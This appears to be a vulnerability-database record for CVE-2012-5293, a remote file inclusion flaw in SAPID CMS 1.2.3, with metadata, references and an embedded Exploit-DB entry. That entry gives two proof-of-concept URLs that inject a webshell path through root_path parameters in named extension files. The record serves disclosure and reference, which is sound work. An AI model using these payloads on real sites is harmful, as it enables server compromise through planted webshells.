ID

VAR-E-201201-0557


CVE

cve_id:CVE-2012-5293

Trust: 1.9

sources: BID: 51323 // EXPLOIT-DB: 18342 // EDBNET: 40743

EDB ID

18342


TITLE

SAPID 1.2.3 Stable - Remote File Inclusion - PHP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 18342

DESCRIPTION

SAPID 1.2.3 Stable - Remote File Inclusion. CVE-82476CVE-82475CVE-2012-5293 . webapps exploit for PHP platform

Trust: 0.6

sources: EXPLOIT-DB: 18342

AFFECTED PRODUCTS

vendor:sapidmodel:stablescope:eqversion:1.2.3

Trust: 1.0

vendor:sapidmodel:cmsscope:eqversion:1.2.3

Trust: 0.3

sources: BID: 51323 // EXPLOIT-DB: 18342

EXPLOIT

# Exploit Title: SAPID Stable (RFI)
# Google Dork: tanyakan pada dan pemula :D
# Date: January 08 2011
# Author: Opa Yong
# Software Link: http://sourceforge.net/projects/sapid/files/sapid-cms/
# Version: SAPID 1.2.3 Stable
# Tested on: Windows XP Home Edition SP2

@POC: http://127.0.1/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[webshell.txt?]
@POC: http://127.0.1/usr/extensions/get_infochannel.inc.php?root_path=[webshell.txt?]

Pesan: Jangan pernah mengaku diri anda hacker,lebih baik orang yg di sekitar anda yg mengaku anda itu adalah hacker.

Special thanks for Dan Pemula

Trust: 1.0

sources: EXPLOIT-DB: 18342

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 18342

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 18342

TYPE

Remote File Inclusion

Trust: 1.0

sources: EXPLOIT-DB: 18342

CREDITS

Opa Yong

Trust: 0.6

sources: EXPLOIT-DB: 18342

EXTERNAL IDS

db:NVDid:CVE-2012-5293

Trust: 1.9

db:EXPLOIT-DBid:18342

Trust: 1.6

db:EDBNETid:40743

Trust: 0.6

db:BIDid:51323

Trust: 0.3

sources: BID: 51323 // EXPLOIT-DB: 18342 // EDBNET: 40743

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2012-5293

Trust: 1.6

url:https://www.exploit-db.com/exploits/18342/

Trust: 0.6

url:http://sapid.sourceforge.net/

Trust: 0.3

sources: BID: 51323 // EXPLOIT-DB: 18342 // EDBNET: 40743

SOURCES

db:BIDid:51323
db:EXPLOIT-DBid:18342
db:EDBNETid:40743

LAST UPDATE DATE

2022-07-27T09:56:53.373000+00:00


SOURCES UPDATE DATE

db:BIDid:51323date:2012-10-08T18:40:00

SOURCES RELEASE DATE

db:BIDid:51323date:2012-01-09T00:00:00
db:EXPLOIT-DBid:18342date:2012-01-09T00:00:00
db:EDBNETid:40743date:2012-01-09T00:00:00